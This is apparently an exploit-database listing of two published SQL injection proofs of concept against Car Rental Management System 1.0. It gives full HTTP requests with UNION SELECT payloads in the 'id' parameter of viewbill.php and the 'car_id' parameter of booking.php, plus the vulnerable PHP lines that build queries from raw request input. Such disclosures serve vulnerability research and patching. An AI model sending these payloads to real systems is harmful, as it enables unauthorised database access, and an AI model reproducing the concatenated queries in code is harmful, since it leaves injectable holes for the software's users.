Exploit for Car Rental Management System 1.0 SQL Injection

Name: Exploit for Car Rental Management System 1.0 SQL Injection
Rating: 5 (688 reviews)
2020-11-16 | CVSS 0.5
## https://sploitus.com/exploit?id=PACKETSTORM:160071
# Exploit Title: Car Rental Management System 1.0 - 'id' SQL Injection (Authenticated)  
# Date: 2020-11-14  
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security  
# Author ID: 8763  
# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code  
# Version: 1.0  
# Tested on: Apache2 and Windows 10  
  
Vulnerable param: id  
-------------------------------------------------------------------------  
GET /WBS/viewbill.php?id=2%27+union+select+1,2,3,@@version,5,6--+- HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 163  
Origin: http://localhost  
Connection: close  
Cookie: COOKIE  
Upgrade-Insecure-Requests: 1  
  
  
-------------------------------------------------------------------------  
  
Source Code: \WBS\viewbill.php  
  
..  
..  
..  
$id =$_REQUEST['id'];  
$result = mysqli_query($conn,"SELECT * FROM bill where owners_id='$id'");  
..  
..  
  
-------------------------------  
  
  
----  
  
  
# Exploit Title: Car Rental Management System 1.0 - 'car_id' Sql Injection  
# Date: 2020-11.13  
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security  
# Author ID: 8763  
# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code  
# Version: 1.0  
# Tested on: Apache2 - Windows 10  
  
Vulnerable param: car_id  
-------------------------------------------------------------------------  
GET /car_rental/booking.php?car_id=1+UNION+ALL+SELECT+1,@@VERSION,3,4,5,6,7,8,9,10# HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: close  
Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean  
Upgrade-Insecure-Requests: 1  
Cache-Control: max-age=0  
  
  
Source Code:  
  
booking.php:  
--------------------------------------------------------------------  
<?php  
$qry = $conn->query("SELECT * FROM cars where id= ".$_GET['car_id']);  
foreach($qry->fetch_array() as $k => $val){  
$$k=$val;  
}